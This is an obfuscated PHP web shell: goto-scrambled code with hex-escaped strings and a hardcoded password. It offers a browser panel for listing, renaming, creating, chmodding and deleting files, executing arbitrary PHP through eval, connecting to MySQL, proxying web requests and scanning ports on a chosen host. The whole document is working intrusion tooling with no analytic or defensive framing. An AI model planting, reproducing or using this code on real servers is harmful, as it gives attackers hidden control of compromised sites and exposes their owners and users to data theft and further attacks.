(<?php goto OA1M9; x6Xi4: if ($_POST["\x6d\x6f\144\145"] == "\162\145\x6e\x66\151\154\145") { if (!rename($dir . $_POST["\157\154\x64\156\141\155\x65"], $dir . $_POST["\156\145\x77\156\x61\x6d\x65"])) { $output = "\x3c\x66\157\156\x74\40\x63\x6f\154\157\162\75\162\145\x64\x3e\x43\x61\x6e\156\x6f\x74\x20\162\145\x6e\x61\155\145\40\x66\x69\x6c\x65\x3c\x2f\146\157\156\164\76"; } else { $output = "\x46\151\x6c\x65\40\162\145\156\141\x6d\145\x64\x2e"; } } goto BcLrB; wPR2p: echo isset($_COOKIE[mysql_name]) ? $_COOKIE[mysql_name] : "\x64\x61\164\x61\142\x61\x73\145"; goto EpBTa; J8nqh: $_nexpwd = "\160\x34\163\163\167\x30\162\144\x5a"; goto TYcYJ; vEqeH: if ($_POST["\x6d\157\144\x65"] == "\x6d\153\x66\151\x6c\x65") { $dir == realpath("\56") ? $file = $_POST["\x6d\x6b\x66\151\x6c\x65"] : ($file = $dir . $_POST["\155\x6b\146\151\x6c\145"]); $output .= "\74\x66\x6f\x72\155\40\141\143\164\x69\x6f\156\x3d\x23\x20\155\145\164\150\x6f\x64\x3d\x70\x6f\163\x74\x3e\74\x69\156\160\x75\x74\x20\164\171\x70\x65\x3d\150\151\144\144\x65\156\40\156\141\x6d\145\x3d\155\157\x64\145\x20\x76\141\x6c\165\x65\x3d\x64\x6f\x6d\x6b\146\151\154\145\76\74\151\156\x70\x75\164\40\x74\171\x70\145\x3d\x68\x69\x64\144\x65\x6e\x20\156\141\x6d\145\75\155\153\x66\x69\x6c\x65\x20\166\x61\154\165\145\x3d\x27" . $_POST["\155\153\146\x69\x6c\145"] . "\47\76\12\74\164\x65\170\x74\x61\x72\145\141\40\162\x6f\167\163\x3d\x33\60\40\x63\x6f\x6c\x73\x3d\61\60\60\40\156\x61\155\x65\75\164\145\170\x74\76\x3c\57\x74\145\170\x74\141\162\145\141\76\74\142\x72\40\57\76\x3c\151\x6e\x70\x75\x74\40\164\x79\x70\145\75\163\x75\142\155\151\x74\40\166\x61\x6c\165\145\x3d\155\141\x6b\145\76\x3c\x2f\146\x6f\162\x6d\76"; } goto HMyaE; ctnEe: if ($_POST["\155\x6f\x64\145"] == "\154\x73") { $output .= "\74\x62\x72\x20\x2f\76\74\142\162\x20\57\76\x44\x69\x72\145\143\164\x6f\162\x79\x20\154\x69\x73\x74\x69\156\147\40\x5b\x20{$dir}\x20\x5d\74\x62\162\40\57\x3e\74\x64\151\166\x20\141\x6c\151\x67\156\x3d\x6c\145\x66\x74\76"; $output .= "\74\164\141\142\154\145\40\167\151\x64\164\150\x3d\42\61\x30\60\45\42\40\142\157\x72\144\x65\162\x3d\42\60\x22\40\143\x65\x6c\154\x73\160\x61\143\151\x6e\147\75\x22\x30\x22\x20\143\x65\x6c\x6c\x70\x61\144\144\x69\156\x67\x3d\x22\60\x22\x3e\12\x20\40\x3c\x74\x72\x3e\xa\xa\x20\x20\x20\x20\x3c\164\x64\40\163\x74\x79\x6c\x65\75\42\x62\x6f\x72\144\x65\x72\x2d\x62\x6f\164\x74\157\155\x3a\43\x46\106\x46\x46\x46\x46\40\x31\160\x78\x20\163\157\154\151\144\73\x22\x20\167\x69\x64\164\150\x3d\42\x31\60\45\42\76\160\x65\162\155\x73\74\x2f\x74\x64\76\12\11\74\x74\x64\40\163\164\171\x6c\x65\x3d\x22\x62\157\x72\x64\145\162\55\x62\x6f\x74\164\x6f\155\x3a\43\x46\x46\x46\x46\x46\x46\40\61\160\x78\x20\x73\x6f\x6c\x69\x64\x3b\x22\40\x77\x69\144\x74\x68\75\x22\65\45\x22\76\46\156\x62\x73\160\x3b\x3c\x2f\x74\144\76\xa\40\40\40\40\74\x74\x64\x20\x73\164\171\x6c\145\75\x22\x62\x6f\x72\144\x65\162\55\142\x6f\x74\164\157\155\72\43\106\106\106\x46\106\x46\x20\61\160\170\x20\163\157\x6c\x69\x64\x3b\42\40\167\x69\x64\164\150\75\x22\65\60\x25\42\x3e\x6e\x61\x6d\145\74\x2f\164\144\x3e\xa\11\74\x74\144\x20\x73\164\x79\154\145\x3d\x22\142\x6f\162\x64\145\162\55\x62\157\x74\164\x6f\x6d\72\43\106\106\x46\106\x46\x46\40\x31\160\x78\40\163\x6f\154\151\x64\x3b\42\40\167\x69\144\x74\x68\75\x22\x32\x30\x25\42\x3e\157\167\156\x65\x72\57\147\x72\157\x75\x70\74\57\164\x64\76\12\x20\40\x20\x20\x3c\x74\144\x20\x73\x74\171\154\145\x3d\x22\142\x6f\x72\x64\x65\x72\55\x62\157\x74\164\157\x6d\72\43\x46\x46\106\x46\106\106\x20\x31\160\x78\40\163\157\154\151\x64\73\42\x20\167\x69\144\164\150\75\x22\x31\x35\45\x22\76\x61\143\x74\x69\157\156\163\74\57\x74\x64\x3e\xa\x20\40\x3c\x2f\164\x72\x3e"; $opendir = opendir($dir) or print "\74\146\x6f\x6e\164\x20\x63\x6f\x6c\x6f\x72\75\x72\145\144\76\x43\141\156\x27\x74\40\x6f\160\145\x6e\x20\144\151\x72\x65\x63\x74\x6f\162\x79\74\57\x66\x6f\156\164\76"; $i = 1; while ($file = readdir($opendir)) { $color = "\x23\x33\63\63\x33\63\x33"; $icons = array("\x74\170\x74" => "\145\x78\164\137\x74\170\164", "\151\156\151" => "\145\x78\164\x5f\164\170\x74", "\163\x71\x6c" => "\x65\x78\x74\137\164\x78\164", "\160\150\160" => "\x65\170\x74\x5f\160\x68\160", "\x70\154" => "\x65\170\x74\x5f\160\154", "\150\164\x6d\154" => "\145\170\x74\137\x68\164\155\154", "\x68\164\155" => "\145\x78\x74\137\x68\x74\155\154", "\x6d\x70\x33" => "\145\170\x74\x5f\155\x70\x33", "\x73\167\146" => "\145\x78\164\x5f\x73\167\x66", "\x72\141\x72" => "\145\170\x74\x5f\164\x61\x72", "\172\x69\160" => "\x65\x78\164\137\x74\x61\162", "\164\x61\162" => "\145\x78\x74\x5f\x74\141\x72", "\147\172" => "\145\170\164\x5f\x74\141\162", "\142\x7a" => "\x65\x78\164\x5f\x74\141\162", "\145\x78\145" => "\x65\170\x74\x5f\145\170\x65", "\152\x70\147" => "\x65\x78\164\137\152\x70\147", "\x70\156\x67" => "\145\x78\x74\137\x6a\x70\x67", "\x67\x69\x66" => "\145\170\x74\x5f\152\x70\147"); if ($dir == realpath("\x2e")) { if (is_file($file)) { $ext = array_pop(explode("\x2e", $file)); if (array_key_exists($ext, $icons)) { $icon = $icons[$ext]; } else { $icon = "\x73\155\x61\x6c\154\137\x75\156\153"; } if (function_exists("\x70\x6f\163\151\170\137\147\x65\164\x70\167\165\x69\144")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "\57" . $gr00p[name]; } else { $owner = fileowner($file) . "\x2f" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "\x3c\x66\157\156\x74\40\x63\157\x6c\157\162\x3d\x72\x65\144\76{$info}\74\x2f\x66\x6f\x6e\x74\x3e"; } elseif (!is_writable($file)) { $info = "\74\146\x6f\x6e\x74\x20\143\157\x6c\x6f\162\x3d\167\150\x69\x74\145\x3e{$info}\x3c\x2f\146\x6f\156\164\76"; } else { $info = "\74\146\x6f\156\x74\40\x63\157\x6c\157\162\75\x67\x72\x65\145\156\x3e{$info}\x3c\57\x66\x6f\x6e\164\76"; } $output .= "\x20\x20\74\x74\162\40\163\x74\x79\x6c\145\75\x22\x62\141\x63\153\x67\x72\x6f\x75\156\144\55\143\157\x6c\x6f\x72\x3a" . $color . "\73\42\76\xa\40\40\x20\x20\x3c\x74\x64\x20\x73\164\171\x6c\145\75\x22\142\157\162\144\x65\x72\55\x62\157\x74\x74\x6f\x6d\72\43\106\106\x46\x46\x46\106\x20\61\x70\x78\40\x73\x6f\x6c\x69\144\73\x22\76" . $info . "\74\x2f\x74\x64\x3e\12\x20\40\x20\x20\74\164\x64\x20\x73\164\171\154\145\x3d\42\x62\x6f\x72\x64\x65\x72\55\x62\157\x74\164\x6f\x6d\x3a\x23\106\106\x46\106\x46\106\x20\61\x70\x78\40\x73\157\154\151\x64\73\42\x20\x61\154\x69\x67\156\x3d\x22\162\x69\x67\150\x74\x22\x3e\x3c\x69\155\147\x20\x73\x72\143\75\42\x68\x74\164\x70\72\x2f\57" . getenv("\x48\x54\x54\120\x5f\x48\117\123\x54") . $_SERVER["\120\110\x50\137\x53\x45\114\x46"] . "\77\141\143\164\x3d\x69\155\x67\x26\151\155\x67\75" . $icon . "\42\40\57\76\74\57\x74\144\x3e\xa\x20\40\40\40\x3c\164\144\40\163\x74\x79\x6c\145\75\x22\x62\x6f\162\x64\145\x72\x2d\x62\x6f\x74\x74\157\155\72\x23\x46\x46\106\x46\x46\106\40\61\160\170\40\x73\x6f\x6c\x69\144\73\x22\x3e" . $file . "\x3c\x2f\x74\144\76\12\11\74\164\144\40\x73\x74\x79\154\145\75\42\142\x6f\162\x64\x65\x72\55\x62\x6f\x74\x74\157\155\72\x23\x46\x46\106\106\x46\106\x20\61\160\170\x20\x73\x6f\154\x69\144\73\x22\76" . $owner . "\74\57\164\144\76\xa\x20\40\x20\x20\74\164\144\40\163\164\x79\x6c\145\75\x22\142\157\162\144\145\162\55\142\157\164\x74\157\x6d\x3a\x23\106\x46\106\106\106\x46\40\61\160\170\40\163\x6f\x6c\x69\x64\73\42\x3e\74\141\40\143\154\x61\x73\163\x3d\42\x6c\x69\156\x6b\x22\40\150\162\x65\x66\x3d\x22\152\x61\166\x61\x73\x63\x72\x69\160\x74\x3a\x64\x6f\143\165\155\x65\x6e\x74\56\x66\x65\144\x69\x74\56\155\x6f\x64\x66\x69\154\145\x2e\166\141\x6c\165\145\x3d\47" . $file . "\47\73\144\x6f\x63\x75\x6d\145\x6e\x74\56\146\145\144\151\164\x2e\x73\x75\x62\155\x69\x74\50\51\x3b\x22\x3e\x3c\151\155\x67\x20\x73\162\143\75\x22" . $_SERVER["\x50\110\120\137\x53\105\x4c\x46"] . "\x3f" . $_SERVER["\x51\x55\x45\x52\x59\137\123\x54\122\111\116\x47"] . "\x26\141\x63\x74\75\x69\x6d\147\46\x69\x6d\x67\75\x63\150\141\x6e\147\145\x22\40\142\157\162\x64\145\x72\x3d\x30\40\57\x3e\x3c\57\141\76\x20\55\40\74\x61\x20\x63\x6c\141\163\163\75\42\x6c\151\156\153\42\x20\x68\162\145\x66\75\42\x6a\x61\x76\141\x73\x63\162\x69\160\164\72\144\157\x63\165\155\x65\156\x74\56\x64\x65\x6c\x66\x69\x6c\x65\x2e\x64\x65\x6c\x66\x69\x6c\x65\56\166\x61\x6c\x75\x65\75\47" . $file . "\x27\x3b\x64\157\x63\x75\x6d\x65\156\164\56\x64\145\x6c\146\151\x6c\145\x2e\x73\165\142\x6d\x69\x74\50\51\x3b\x22\76\x3c\x69\155\x67\x20\163\x72\143\x3d\x22" . $_SERVER["\x50\110\x50\137\123\x45\114\x46"] . "\x3f" . $_SERVER["\x51\x55\x45\122\x59\137\x53\x54\x52\x49\x4e\107"] . "\46\x61\143\164\x3d\151\155\x67\46\151\x6d\147\75\144\x65\x6c\145\x74\x65\42\40\142\157\162\144\x65\x72\75\60\40\x2f\76\74\x2f\x61\x3e\74\57\x74\x64\76\xa\40\x20\x3c\57\164\x72\x3e"; } else { if (function_exists("\160\x6f\x73\x69\170\137\x67\145\x74\160\x77\x75\x69\144")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "\x2f" . $gr00p[name]; } else { $owner = fileowner($file) . "\57" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "\74\146\x6f\x6e\164\40\143\x6f\x6c\x6f\162\x3d\162\x65\x64\76{$info}\74\x2f\146\x6f\x6e\x74\x3e"; } elseif (!is_writable($file)) { $info = "\x3c\146\x6f\x6e\x74\x20\143\x6f\x6c\157\x72\75\167\150\151\x74\x65\x3e{$info}\x3c\57\x66\x6f\156\x74\x3e"; } else { $info = "\x3c\x66\157\x6e\164\40\x63\157\154\157\x72\75\147\x72\145\145\x6e\x3e{$info}\74\x2f\x66\x6f\x6e\x74\76"; } $output .= "\x20\x20\74\x74\162\x20\163\164\x79\x6c\x65\x3d\x22\x62\x61\143\x6b\x67\x72\x6f\x75\x6e\x64\55\x63\157\154\157\x72\72" . $color . "\x3b\x22\x3e\xa\40\x20\x20\40\74\x74\x64\40\x73\x74\x79\154\145\x3d\42\142\157\162\144\145\x72\x2d\142\157\164\x74\157\x6d\72\x23\106\x46\x46\x46\106\x46\x20\x31\160\170\x20\163\x6f\154\151\144\73\42\76" . $info . "\x3c\57\164\144\x3e\12\40\x20\40\40\x3c\164\x64\x20\x73\164\x79\154\x65\75\42\142\x6f\162\144\x65\162\x2d\x62\157\x74\x74\x6f\155\72\43\106\x46\106\x46\x46\106\x20\x31\x70\170\x20\163\x6f\154\x69\144\x3b\42\x20\141\154\x69\x67\x6e\x3d\x22\162\151\x67\x68\164\x22\x3e\74\151\x6d\x67\x20\163\x72\143\75\42\x68\x74\x74\x70\x3a\57\57" . getenv("\110\x54\124\120\137\x48\117\x53\124") . $_SERVER["\120\110\x50\137\x53\x45\114\x46"] . "\77" . $_SERVER["\121\125\x45\x52\131\137\x53\124\122\x49\116\107"] . "\x26\141\143\x74\x3d\x69\155\147\x26\151\155\x67\75\146\157\x6c\144\x65\162\42\x20\x2f\x3e\74\57\164\144\76"; $output .= "\x3c\x74\144\40\x73\x74\x79\154\145\x3d\x22\142\157\x72\x64\145\x72\x2d\142\157\164\164\157\155\72\43\106\106\106\106\106\x46\x20\x31\x70\170\x20\x73\x6f\x6c\151\x64\x3b\42\x3e\74\141\x20\x63\154\141\x73\x73\x3d\42\x6c\x69\156\x6b\x22\40\150\162\145\146\75\x22\x6a\141\x76\141\163\143\162\151\x70\x74\x3a\144\157\x63\165\x6d\x65\x6e\x74\x2e\146\x6f\x6c\x64\x65\x72\56\144\151\162\56\166\141\x6c\165\x65\75\47" . addslashes(realpath($file)) . "\47\x3b\x64\157\x63\x75\x6d\145\x6e\164\x2e\146\x6f\x6c\x64\x65\162\x2e\163\x75\142\155\151\x74\50\x29\x3b\x22\76" . $file . "\74\x2f\x61\76\74\x2f\x74\x64\76\xa\x9\74\x74\144\x20\163\164\x79\x6c\x65\75\42\142\157\162\x64\x65\x72\55\x62\x6f\x74\164\x6f\x6d\72\x23\x46\106\x46\106\x46\x46\x20\x31\x70\x78\x20\x73\x6f\154\151\144\x3b\42\76" . $owner . "\74\x2f\164\x64\76\xa\x20\x20\40\40\74\x74\144\x20\163\164\171\x6c\x65\x3d\x22\142\x6f\x72\x64\x65\162\x2d\142\157\164\x74\157\x6d\x3a\x23\x46\106\x46\106\106\106\40\61\x70\x78\x20\163\x6f\154\151\x64\x3b\x22\76\74\x61\x20\143\154\141\163\x73\x3d\42\x6c\x69\156\x6b\42\40\x68\162\145\x66\x3d\x22\152\141\166\x61\x73\x63\x72\151\x70\164\72\144\x6f\143\x75\x6d\x65\156\x74\x2e\146\157\154\144\145\162\x2e\144\151\x72\56\x76\x61\x6c\165\x65\x3d\47" . addslashes(realpath($file)) . "\47\73\x64\x6f\143\x75\x6d\x65\x6e\164\56\146\157\x6c\144\145\x72\56\163\x75\x62\155\x69\x74\x28\51\x3b\x22\76\107\x6f\x3c\x2f\x61\76\74\x2f\164\x64\x3e\xa\x20\40\74\x2f\164\162\x3e"; } } else { chdir($dir); if (is_file($file)) { $ext = array_pop(explode("\56", $file)); if (array_key_exists($ext, $icons)) { $icon = $icons[$ext]; } else { $icon = "\163\x6d\x61\x6c\x6c\137\165\156\153"; } if (function_exists("\x70\x6f\163\x69\x78\x5f\147\145\164\160\x77\165\x69\144")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "\57" . $gr00p[name]; } else { $owner = fileowner($file) . "\x2f" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "\74\x66\x6f\x6e\164\x20\143\x6f\x6c\x6f\x72\x3d\162\x65\144\76{$info}\74\x2f\x66\x6f\x6e\164\x3e"; } elseif (!is_writable($file)) { $info = "\74\146\x6f\x6e\x74\40\x63\x6f\x6c\x6f\x72\75\167\150\151\164\x65\76{$info}\74\57\146\157\x6e\x74\76"; } else { $info = "\x3c\x66\157\156\x74\x20\143\x6f\154\x6f\162\x3d\147\162\145\x65\156\76{$info}\74\x2f\x66\x6f\156\164\76"; } $output .= "\x20\x20\x3c\164\162\x20\x73\164\171\x6c\x65\75\42\142\x61\x63\153\x67\162\x6f\x75\156\144\x2d\x63\x6f\154\x6f\x72\x3a" . $color . "\73\42\76\12\40\x20\x20\40\74\164\144\40\163\164\171\x6c\x65\75\x22\x62\157\x72\x64\x65\162\55\142\x6f\x74\x74\157\155\72\43\x46\x46\x46\106\106\106\40\x31\x70\x78\40\163\157\x6c\151\x64\73\x22\x3e" . $info . "\x3c\x2f\164\144\x3e\12\x20\x20\40\x20\74\x74\x64\40\163\164\171\x6c\145\x3d\x22\x62\x6f\162\x64\145\x72\x2d\x62\x6f\x74\x74\157\x6d\x3a\x23\x46\x46\106\106\106\106\x20\x31\160\170\x20\x73\157\154\151\x64\x3b\42\x20\x61\x6c\x69\x67\156\x3d\x22\x72\151\147\150\164\42\x3e\74\151\155\x67\40\x73\162\143\x3d\x22\150\164\164\x70\x3a\x2f\57" . getenv("\x48\124\x54\120\137\x48\117\123\x54") . $_SERVER["\x50\110\x50\137\123\105\x4c\x46"] . "\x3f" . $_SERVER["\x51\x55\105\122\131\x5f\x53\x54\x52\x49\116\x47"] . "\x26\x61\143\164\75\151\155\147\x26\151\x6d\x67\x3d" . $icon . "\x22\x20\57\x3e\74\57\164\x64\x3e\xa\x20\x20\40\40\x3c\164\x64\40\163\x74\171\154\145\75\42\142\157\x72\144\x65\x72\55\142\157\x74\x74\157\x6d\72\43\106\106\106\106\x46\x46\40\61\160\170\40\163\x6f\154\151\x64\x3b\42\x3e" . $file . "\x3c\57\x74\144\76\xa\11\x3c\164\144\x20\163\x74\171\x6c\145\x3d\42\142\157\x72\x64\x65\162\55\142\x6f\164\x74\157\x6d\x3a\43\106\106\106\x46\x46\x46\40\x31\160\170\x20\163\x6f\154\x69\x64\x3b\x22\76" . $owner . "\74\57\164\144\76\xa\40\40\40\40\x3c\x74\x64\x20\163\x74\171\x6c\x65\x3d\42\x62\x6f\x72\x64\x65\x72\55\x62\157\164\x74\x6f\x6d\72\43\106\x46\106\106\106\106\40\x31\160\x78\40\163\157\x6c\x69\x64\x3b\42\x3e\x3c\x61\40\143\154\141\x73\163\x3d\42\154\x69\x6e\153\x22\x20\150\162\145\x66\75\42\152\141\166\141\x73\x63\x72\151\160\164\x3a\144\x6f\x63\x75\155\x65\156\x74\x2e\x66\145\x64\151\x74\x2e\155\x6f\144\x66\151\154\145\x2e\x76\141\154\x75\x65\x3d\47" . $file . "\x27\x3b\144\157\x63\x75\x6d\x65\156\x74\x2e\x66\145\144\151\x74\56\163\165\x62\155\151\x74\x28\x29\x3b\x22\x3e\x3c\151\155\x67\x20\x73\x72\x63\75\x22" . $_SERVER["\120\110\120\x5f\x53\105\114\106"] . "\x3f" . $_SERVER["\x51\125\x45\x52\x59\137\x53\124\122\x49\116\x47"] . "\x26\x61\143\x74\x3d\151\x6d\147\46\x69\155\147\75\x63\x68\141\156\147\x65\42\40\142\x6f\162\144\145\162\75\x30\x20\x2f\76\x3c\x2f\x61\76\40\x2d\40\74\x61\40\x63\x6c\141\x73\163\75\x22\x6c\151\156\x6b\42\x20\x68\x72\x65\146\75\42\x6a\x61\x76\x61\163\x63\x72\x69\x70\x74\x3a\x64\157\x63\165\155\x65\x6e\x74\x2e\144\x65\154\146\x69\x6c\x65\56\x64\x65\154\146\151\x6c\x65\x2e\166\x61\154\x75\145\75\47" . $file . "\47\73\x64\x6f\143\165\155\x65\156\164\x2e\x64\145\154\x66\x69\154\145\x2e\x73\x75\142\155\151\x74\x28\51\73\x22\x3e\74\151\155\x67\x20\163\162\x63\x3d\42" . $_SERVER["\120\x48\x50\x5f\x53\x45\114\106"] . "\x3f" . $_SERVER["\x51\125\x45\x52\131\137\123\124\122\x49\116\107"] . "\46\x61\x63\164\75\151\x6d\x67\x26\x69\155\147\75\144\x65\154\145\164\145\x22\x20\142\x6f\162\x64\x65\162\x3d\x30\x20\x2f\76\74\57\x61\x3e\74\57\164\x64\x3e\xa\x20\40\74\x2f\x74\x72\76"; } else { if (function_exists("\160\x6f\x73\151\170\x5f\x67\x65\x74\x70\167\x75\x69\x64")) { $uid = posix_getpwuid(fileowner($file)); $gr00p = posix_getgrgid(filegroup($file)); $owner = $uid[name] . "\57" . $gr00p[name]; } else { $owner = fileowner($file) . "\x2f" . filegroup($file); } $perms = fileperms($file); $info = getperms($perms); if (!is_readable($file)) { $info = "\x3c\146\x6f\156\164\40\x63\x6f\154\157\x72\75\162\145\x64\76{$info}\x3c\x2f\x66\x6f\156\x74\x3e"; } elseif (!is_writable($file)) { $info = "\x3c\x66\x6f\156\x74\40\143\157\x6c\x6f\x72\75\167\150\151\164\x65\76{$info}\x3c\57\x66\x6f\156\x74\76"; } else { $info = "\74\x66\157\x6e\x74\40\x63\x6f\x6c\157\x72\75\x67\162\x65\x65\x6e\x3e{$info}\74\x2f\146\157\156\x74\76"; } $output .= "\40\x20\74\164\x72\x20\163\x74\x79\154\x65\75\x22\x62\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x2d\143\157\154\x6f\162\72" . $color . "\x3b\42\76\xa\40\40\x20\40\74\164\x64\40\x73\x74\171\154\x65\x3d\42\x62\x6f\162\x64\x65\x72\x2d\x62\x6f\x74\164\157\x6d\x3a\x23\x46\x46\106\x46\x46\106\x20\x31\x70\170\x20\163\157\x6c\x69\144\73\42\x3e" . $info . "\74\x2f\164\144\76\12\x20\40\x20\40\x3c\164\x64\40\163\x74\x79\154\x65\75\x22\x62\x6f\162\x64\x65\x72\x2d\142\157\x74\164\x6f\x6d\x3a\x23\x46\x46\106\106\x46\x46\x20\61\x70\x78\x20\x73\x6f\x6c\151\x64\x3b\42\40\x61\x6c\151\147\156\75\42\162\151\147\x68\x74\42\x3e\74\151\155\147\40\163\x72\143\x3d\x22\150\164\x74\160\72\57\57" . getenv("\x48\x54\x54\x50\x5f\x48\117\123\124") . $_SERVER["\120\x48\x50\137\x53\105\x4c\106"] . "\x3f" . $_SERVER["\121\x55\105\x52\131\x5f\x53\124\x52\x49\x4e\x47"] . "\x26\x61\x63\x74\x3d\151\x6d\x67\46\x69\x6d\147\x3d\x66\x6f\x6c\x64\145\162\x22\40\x2f\x3e\x3c\57\164\144\76\12\x20\40\40\x3c\164\x64\40\x73\164\171\154\x65\x3d\42\x62\157\x72\144\x65\x72\x2d\x62\157\164\164\x6f\x6d\72\43\x46\106\x46\x46\x46\x46\x20\61\x70\170\40\163\157\x6c\x69\144\x3b\x22\x3e\74\x61\40\143\154\x61\x73\163\75\42\x6c\151\156\x6b\x22\x20\150\x72\145\146\75\42\152\x61\166\141\163\x63\162\151\x70\164\72\144\157\143\165\155\145\x6e\x74\x2e\146\x6f\x6c\x64\x65\x72\56\144\151\162\56\166\141\154\x75\x65\75\x27" . addslashes(realpath($file)) . "\47\73\144\x6f\143\x75\x6d\145\x6e\164\56\x66\x6f\x6c\x64\x65\162\x2e\x73\165\142\155\151\x74\x28\x29\73\42\x3e" . $file . "\74\57\x61\76\74\x2f\x74\144\x3e\xa\x9\x3c\164\x64\x20\163\x74\171\x6c\x65\75\42\142\157\162\x64\145\162\55\142\x6f\164\x74\x6f\x6d\72\43\x46\106\106\106\106\x46\x20\61\160\x78\40\x73\x6f\x6c\x69\x64\73\x22\76" . $owner . "\74\x2f\164\144\x3e\12\x20\40\40\40\x3c\164\x64\x20\x73\x74\x79\x6c\145\x3d\x22\142\x6f\162\x64\x65\x72\55\142\157\164\x74\157\x6d\72\x23\x46\106\106\106\106\x46\x20\x31\x70\x78\40\x73\157\154\x69\x64\x3b\42\x3e\x3c\141\40\x63\154\141\163\163\x3d\x22\154\151\156\153\x22\40\150\162\145\146\x3d\x22\152\141\166\141\163\x63\x72\x69\x70\164\72\144\157\143\x75\155\x65\156\x74\56\x66\157\x6c\144\145\x72\x2e\x64\151\162\x2e\x76\141\x6c\165\145\x3d\47" . addslashes(realpath($file)) . "\x27\x3b\144\x6f\x63\165\x6d\x65\156\164\56\146\157\154\x64\x65\x72\x2e\163\165\x62\x6d\x69\x74\50\51\x3b\42\x3e\x47\x6f\x3c\57\x61\76\x3c\57\x74\144\x3e\xa\x20\40\x3c\57\164\x72\76"; } } $i++; } $output .= "\x3c\57\144\x69\166\x3e"; } goto zilZl; m_EEw: ?>
<br>
<br>
<?php goto G8yfz; a14x1: $freespace .= "\x20\107\102"; goto XBp7x; apvn8: $reglobals_off_msg = stripslashes("\x3c\x66\157\156\164\40\143\x6f\x6c\x6f\x72\x3d\x72\145\x64\x3e\x52\145\x67\151\x73\x74\145\x72\40\107\x6c\157\x62\141\x6c\x73\72\40\117\x46\106\74\x2f\x66\157\x6e\x74\76\74\x62\x72\40\x2f\x3e"); goto niQR0; NxT89: die; goto juKuz; vLfEF: ?>
<?php goto gn1XG; LoEfa: $current_user = "\127\x68\x6f\40\x61\162\x65\40\171\x6f\165\77\40" . get_current_user() . "\x3c\x62\162\40\57\76"; goto Cpo1U; bYNNj: $percentbusy = 100 - $percentfree; goto eRXYx; EpBTa: ?>
" size="10" />
<input name="submit" type="submit" value="MySQL" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
<div align="center"><strong>:: PHP Execution :: </strong><br>
<input type="hidden" value="eval" name="mode" />
<input name="eval" type="text" size="30" />
<input type="submit" value="Eval" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post name="folder" id="folder">
<div align="center"><strong>:: Go Dir ::</strong> <br>
<input type=hidden name='mode' value='ls'>
<input type=text value='<?php goto ihQrV; Aqdh7: function getperms($perms) { if (($perms & 49152) == 49152) { $info = "\x73"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\144"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\160"; } else { $info = "\165"; } $info .= $perms & 256 ? "\x72" : "\55"; $info .= $perms & 128 ? "\167" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\163" : "\170" : ($perms & 2048 ? "\x53" : "\x2d"); $info .= $perms & 32 ? "\162" : "\x2d"; $info .= $perms & 16 ? "\x77" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\x73" : "\170" : ($perms & 1024 ? "\123" : "\55"); $info .= $perms & 4 ? "\x72" : "\55"; $info .= $perms & 2 ? "\x77" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\x54" : "\55"); return $info; } goto RHFlS; NJm6N: ?>
' name='dir'>
<input type=submit value=change/list>
</div>
</form></td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><div align="center">
<form method="post" action="#">
<strong>:: Proxy ::</strong> <br>
<input name="mode" type="hidden" id="mode" value="proxysurf" />
url: <input name="url" type="text" size="30" />
<input type="submit" value="surf" />
<input name="curl" type="checkbox" id="curl" value="curl" /> curl
<input name="fopen" type="checkbox" id="fopen" value="fopen" /> fopen<br />
</form></div>
</td>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
<div align="center"><strong>:: File Change Mode:: </strong><br>
<input type="hidden" value="chmod" name="mode" />
<input name="filename" type="text" id="filename" value="file" size="15" />
<input name="filemode" type="text" id="filemode" value="mode" size="15" />
<input type="submit" value="Chmod" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
<div align="center"><strong>:: Port Scan :: </strong><br>
<input type="hidden" value="scan" name="mode" />
<input name="host" type="text" id="host" value="host" size="15" />
<input name="minport" type="text" value="max port" size="10" />
<input name="maxport" type="text" id="maxport" value="max port" size="10" />
<input type="submit" value="scan" />
</div>
</form> </td>
</tr>
</table>
<form action=# name=tools method=post>
<span class="Stile1">
<input type=hidden name=mode value=tools />
<input type=hidden name=nometool />
</span>
</form>
<span class="Stile1">
<div align="center"><a class="link" href="javascript:document.folder.dir.value='<?php goto svfxX; ffIPu: $safemode_off_msg = "\x3c\x66\x6f\156\164\40\x63\157\x6c\157\x72\x3d\x67\162\145\x65\x6e\76\x53\141\146\x65\40\x4d\157\x64\145\72\x20\x4f\x46\106\x3c\x2f\x66\x6f\156\164\x3e\x3c\x62\162\x20\x2f\x3e"; goto JoxvX; lufJS: if ($_POST["\x6d\x6f\144\x65"] == "\x73\x63\x61\x6e") { $opent = array(); $host = $_POST[host]; $range = range($_POST[min_port], $_POST[max_port]); foreach ($range as $port) { $con = fsockopen($host, $port, $errno, $errstr, 12); if ($con) { $opent[] = $port; } } $output = "\106\157\165\x6e\144\x20" . count($opent) . "\40\x6f\160\145\x6e\x65\144\40\160\x6f\x72\164\163\x3a\x3c\142\x72\x20\x2f\x3e"; while (list($num, $value) = each($opent)) { $output .= "\74\x62\x3e{$num}\74\x2f\x62\76\x20\x3a\x20{$value}\74\142\x72\x20\x2f\x3e"; } } goto MXWZj; o_REo: echo isset($_COOKIE[mysql_host]) ? $_COOKIE[mysql_host] : "\150\157\x73\x74"; goto l39TP; gn1XG: echo $auf; goto BKIMW; 